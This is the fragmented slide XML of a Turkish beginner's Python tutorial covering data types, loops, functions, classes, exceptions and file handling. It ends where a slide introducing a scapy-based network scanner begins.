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80" r:id="rId21"/>
    <p:sldId id="281" r:id="rId22"/>
    <p:sldId id="284" r:id="rId23"/>
    <p:sldId id="285" r:id="rId24"/>
    <p:sldId id="286" r:id="rId25"/>
    <p:sldId id="287" r:id="rId26"/>
    <p:sldId id="288" r:id="rId27"/>
    <p:sldId id="289" r:id="rId28"/>
    <p:sldId id="293" r:id="rId29"/>
    <p:sldId id="282" r:id="rId30"/>
    <p:sldId id="290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23720DD-5B6D-40BF-8493-A6B52D484E6B}" type="datetimeFigureOut">
              <a:rPr lang="tr-TR" smtClean="0"/>
              <a:t>30.10.2021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3284984"/>
            <a:ext cx="6629400" cy="513178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PYTHON TUTORİAL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6553200" cy="1085056"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR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KAAN EFE ÖĞÜT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR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ADLİ BİLİŞİM MÜHENDİSİ</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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6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6864" cy="792088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>Tuple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1268760"/>
            <a:ext cx="7848872" cy="50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-Aynı şekilde diğer yazılım dillerinde bulunmayan bu komut ile oluşturduğumuz liste üzerinde bir daha oynama yapamayız.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_tuple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 = (“a”,1,”c”)     //Şeklinde tanımlanır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_tuple.count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(“a”)  komutu ile liste içerisinde bulunan tüm “a” </a:t>
            </a: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ların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 sayısını öğrenebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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My_tuple.index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(1) komutu ile parantez içerisine yazdığımız değerin hangi </a:t>
            </a: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indexte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 bulunduğunu öğrenebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Gerekli olan </a:t>
            </a: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String,List,Set,Dictionary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 yazımlarını öğrendikten sonra yavaş yavaş döngülere geçiş yapmak istiyorum.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Diğer yazım dillerinden farklı olarak ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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&amp;&amp; yerine </a:t>
            </a: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 komutu, || yerine ise </a:t>
            </a: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 komutu kullanılmaktadır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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46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5064953" cy="720080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>IF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>Syntax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077623"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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İf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x&gt;y:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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(“x&gt;y”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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Elif x==y:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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( “x=y”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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buNone/>
            </a:pP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(“y&gt;x”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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4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8280920" cy="936104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>IF ÖRNEK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412776"/>
            <a:ext cx="8280920" cy="50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 [1,2,3,4,5]</a:t>
            </a:r>
          </a:p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İf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2 in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Else :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-----*------</a:t>
            </a:r>
          </a:p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My_dict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= {“k1”:100,”k2”:200}</a:t>
            </a:r>
          </a:p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İf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 “k1” in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my_dict.keys</a:t>
            </a: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(“True”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/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2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5064953" cy="936104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>For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0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-Diğer yazılım dillerinden de aşina olduğumuz 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yapısı burada farklı bir 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ile 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kullanılmıyor.Kullanımını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örnekler ile desteklemek istiyorum.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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= {1,2,3,4,5}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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x in 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new_number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 = x*5</a:t>
            </a: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rint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new_number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9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sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="476672"/>
            <a:ext cx="280831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 err="1">
                <a:effectLst/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200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  [1,2,3,4,5]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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x in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x%2 == 0 :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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 marL="0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x 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if x ==2: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print("true")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endParaRPr lang="tr-TR" sz="2200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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3131840" y="404664"/>
            <a:ext cx="576064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my_new_list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[("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a","b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"),("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c","d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"),("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e","f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")]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x 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my_new_list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print(x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ÇIKTI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400" dirty="0"/>
              <a:t>('a', 'b') ('c', 'd') ('e', 'f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>')</a:t>
            </a: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my_new_list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print(x)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print(y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ÇIKTI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2400" dirty="0"/>
              <a:t>a b c d e f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Düz Bağlayıcı 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2843808" y="476672"/>
            <a:ext cx="0" cy="5544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2987824" y="476672"/>
            <a:ext cx="0" cy="5544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7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395536" y="260648"/>
            <a:ext cx="5184576" cy="64807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Continue,Break,Pass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395536" y="1124744"/>
            <a:ext cx="3816424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-Bu terimleri örnekler ile göstermek daha verimli olacaktır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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= [10,20,30,40,50,60]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==30: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break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* 5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Çıktı</a:t>
            </a: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50 100</a:t>
            </a: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&amp;Kodu durdurur.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4499992" y="1124744"/>
            <a:ext cx="4104456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item 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if item ==30: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continue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print(item *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Çıktı</a:t>
            </a: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10 20 40 50 60</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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Atlama işlemi yapar.</a:t>
            </a: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no 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pass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&amp;Kodu çalıştırmaz.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Düz Bağlayıcı 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3851920" y="119675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4139952" y="119675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5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4820301" cy="792088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>While</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="3500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7272808" cy="548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Syntax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şart&gt;0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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 marL="0" indent="0"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Şartı sağladıkça işlem yapılır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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= [1,2,3,4,5]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3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print("3 in my list")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my_list.pop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Liste içerisinde 3 olduğu sürece işlem gerçekleşecektir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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1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7272808" cy="815471"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t>Kullanışlı Metotlar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251520" y="1117093"/>
            <a:ext cx="4104456" cy="5415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Komutu</a:t>
            </a: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(20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Çıktı</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0"/>
              <a:t>[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1800" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0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%0’dan 20’ye kadar olan sayıları yazdırır.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index,number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in enumerate(list(range(5,15))):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print(index)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print(number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Çıktı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0 5 1 6 2 7 3 8 4 9 5 10 6 11 7 12 8 13 9 14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248472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randint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randint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(0,1000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      -&gt; 789    %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İnt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atar.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my_list_2 =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(0,10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shuffle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shuffle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(my_list_2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[3, 7, 2, 5, 1, 0, 8, 9, 6, 4]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Düz Bağlayıcı 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1340768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4355976" y="1340768"/>
            <a:ext cx="0" cy="511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60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>
          <a:xfrm>
            <a:off x="251520" y="368660"/>
            <a:ext cx="2213148" cy="504056"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>Zip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251520" y="1061545"/>
            <a:ext cx="410445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sport_list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 ["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swim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basketball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"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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calories_list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=[100,200,300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day_list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=["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m","t","w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"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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zip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sport_list,calories_list,day_list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-&gt;  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1"/>
              <a:t>zip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0"/>
              <a:t> at 0x2b49bb26580&gt;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zip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sport_list,calories_list,day_list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x in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print(x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Çıktı</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1"/>
              <a:t>run</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0"/>
              <a:t>', 100, 'm') ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1"/>
              <a:t>swim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0"/>
              <a:t>', 200, 't') ('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" err="1"/>
              <a:t>basketball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0"/>
              <a:t>', 300, 'w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-T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&amp;3 Adet listeyi birleştirmemize olanak sağlar.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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4644008" y="368660"/>
            <a:ext cx="2214753" cy="504056"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1" smtClean="0"/>
              <a:t>List</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" smtClean="0"/>
              <a:t> Advanced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4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4644008" y="1052736"/>
            <a:ext cx="4032448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new_list2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=[]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my_string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metallica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element in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my_string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new_list2.append(element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new_list2</a:t>
            </a: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['m', 'e', 't', 'a', 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'l',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'l', 'i', 'c', 'a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']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[element for element in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my_string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new_list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Çıktı</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>['m', 'e', 't', 'a', 'l', 'l', 'i', 'c', 'a']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4499992" y="620688"/>
            <a:ext cx="0" cy="597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4499992" y="620688"/>
            <a:ext cx="0" cy="597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66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179512" y="260649"/>
            <a:ext cx="6264696" cy="576063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Fonksiyon metotları</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="3500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79512" y="1052736"/>
            <a:ext cx="4104456" cy="563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my_string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= "Kaan"</a:t>
            </a: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my_string_upper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my_string.upper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my_string_upper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hello_world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print("hello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")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hello_world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hello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hello_programing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(name):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print("hello"+ " "+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name)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hello_programing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")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kaan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3779912" y="1052736"/>
            <a:ext cx="5112568" cy="5557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summ2(*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return sum(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summ2(10,20,30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   -&gt;  60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my_func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my_func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("a","b",1,2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  -&gt; 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('a', 'b', 1, 2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example_func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(**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example_func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=100,swim=200,basketball=300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{'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': 100, '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swim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': 200, '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basketball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': 300}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80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864096"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>Variables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>(Değişkenler)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340767"/>
            <a:ext cx="8712968" cy="5256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smtClean="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-Diğer 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dillerden farklı olarak </a:t>
            </a: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int,float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 şeklinde belirtmeden değişken tanımlayabiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-X=3                         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/Ayrıca değişken tanımladıktan sonra “;” koymamıza gerek yoktur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-Y=4    </a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-pi 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= 3.14             </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-Bilinen  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(“+”, “-“, “/” , “*” ) kurallarının haricinde;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/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**3 =8  örneğinde olduğu gibi ** işaretiyle üst alma işlemi yapılabilir.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" smtClean="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-10%2=0 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örneğinde olduğu gibi % işaretiyle </a:t>
            </a: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 alma işlemi yapılabilir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2000" dirty="0" smtClean="0"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Diğer dillerden farklı olarak;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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r_int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(r) komutu ile bir değişkeni istediğimiz türe çevirebiliriz.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="22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41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İçerik Yer Tutucusu 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="548680"/>
            <a:ext cx="3960440" cy="584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: Gönderdiğimiz birden fazla değişkeni kullanmamıza yardımcı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olur.Genellikle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bir değişken bir fonksiyon olarak kullanılır.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control_string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(string):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return "Metallica" in string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control_string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("Metallica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kdkdkd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-&gt; True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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my_artist_list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=["Metallica","Madanno","Quenn","Megadeth","Metallica2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"]</a:t>
            </a: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control_string,my_artist_list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da-DK" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>[True, False, False, False, False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1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sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="548680"/>
            <a:ext cx="388843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: Gönderdiğimiz değişken üzerinde işlem gerçekleştirip geri döndürür.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multiply(number):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return number *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mylist3=[1,2,3,4,5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num:num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*4,mylist3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Çıktı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[4, 8, 12, 16, 20]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8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251520" y="332657"/>
            <a:ext cx="4820301" cy="576064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="2500" dirty="0" smtClean="0"/>
              <a:t>CLASS : OOP</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="2500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251520" y="1052736"/>
            <a:ext cx="4032448" cy="57039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Projelerde sık sık kullanılan kod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yapısıdır.Birden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fazla bilgiyi tutmamıza olanak sağlar.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone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Musician():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job="musician"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%Kurucudur her fonksiyon çalıştığında çalışır.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__(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self,name,age,instrument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self.age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self.instrument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instrument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 %Metot kısmıdır.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sing(self):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print(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f"We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the champions! {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self.instrument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}")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#’f’ ifadesi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instrument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kısmının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çekilmesiini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sağlar.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Ekleme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my_musician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Musician("James",50,"Guitar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")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4139952" y="188640"/>
            <a:ext cx="4752528" cy="6408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Sorgulamalar:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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my.musician.age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-&gt; 50</a:t>
            </a:r>
          </a:p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my.musician.name = ‘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Lars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my.musician.name -&gt;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Lars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my_musician.sing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 smtClean="0"/>
              <a:t>-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>are the champions! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Guitar</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1400" dirty="0" smtClean="0"/>
          </a:p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***---***----***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DogYears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year_factor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__(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self,age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self.age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age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self.name ="Bar"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self.age_multipled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age *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calculation(self):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self.age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DogYears.year_factor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my_dog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DogYears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(7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my_dog.calculation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() -&gt; 49</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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my_dog.age_multipled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-&gt; 49</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1631514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15645"/>
            <a:ext cx="8064896" cy="792087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>Methods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95536" y="836712"/>
            <a:ext cx="6120680" cy="5631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class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Fruits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def __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init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__(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self,name,calories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self.name= name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self.calories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calories</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1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def __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str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return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f"{self.name} has {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self.calories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} "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def __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len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return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self.calories</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1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my_fruit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR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= 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Fruits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("Muz",200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR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tr-TR" sz="1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my_fruit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR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-&gt;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Muz has 200 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-TR" sz="1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%Self standart olarak gelmektedir.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" sz="1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71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1"/>
            <a:ext cx="6624736" cy="764704"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" err="1" smtClean="0"/>
              <a:t>Try-Except-Finally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896544" cy="4839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Bu terimleri örnek üzerinden göstermek çok daha faydalı olacaktır.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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True: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my_int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("Sayı gir"))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("Lütfen Sayı Giriniz")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continue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("Sayı girildi")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   break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("İşlem yapılacak")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3995936" y="2204864"/>
            <a:ext cx="3240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Çıktı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Sayı Girilmediğinde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Sayı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gir -&gt; Kaan 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Lütfen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Sayı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Giriniz. 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İşlem yapılacak.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Sayı Girildiğinde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Sayı gir -&gt; 123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Sayı Girildi.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İşlem yapılacak.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762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4820301" cy="648072"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Dosya İşlemleri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4032448" cy="554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Dosyaya yazdırma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%%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writefile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myfile.txt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test2 test3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="tr-T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Dosyadan okuma</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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My_file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(‘myfile.txt’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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my_file.read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-&gt;’test1\ntest2\ntest3\n’</a:t>
            </a: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Ya da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open("myfile.txt") as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my_file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file_read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my_file.read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file_read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'test1\ntest2\ntest3\n'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067944" y="1124744"/>
            <a:ext cx="4464496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open("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myfile.txt",mode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="r") as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my_new_file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read_files_new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my_new_file.read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read_files_new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-&gt; 'test1\ntest2\ntest3\n‘</a:t>
            </a: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Dosyaya Yazma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open("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myfile.txt",mode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="w") as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my_new_file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my_new_file.write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("test4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open("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myfile.txt",mode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="r") as my_new_file2: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read_files2 = my_new_file2.read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read_files2</a:t>
            </a:r>
          </a:p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'test4'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22499390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188641"/>
            <a:ext cx="4820301" cy="576063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="tr-TR" sz="3500" dirty="0" smtClean="0"/>
              <a:t>NET SCANNER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176464" cy="57039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1500" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ağ içerisindeki cihazlar hakkında bilgi toplamak için yazılan bir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1500" dirty="0" err="1" smtClean="0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1500" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> örneğiyle devam edeceğim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr mar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scapy.all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scapy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optparse</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR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500" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>%Gerekli kütüphaneler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="1500" dirty="0" err="1" smtClean="0">
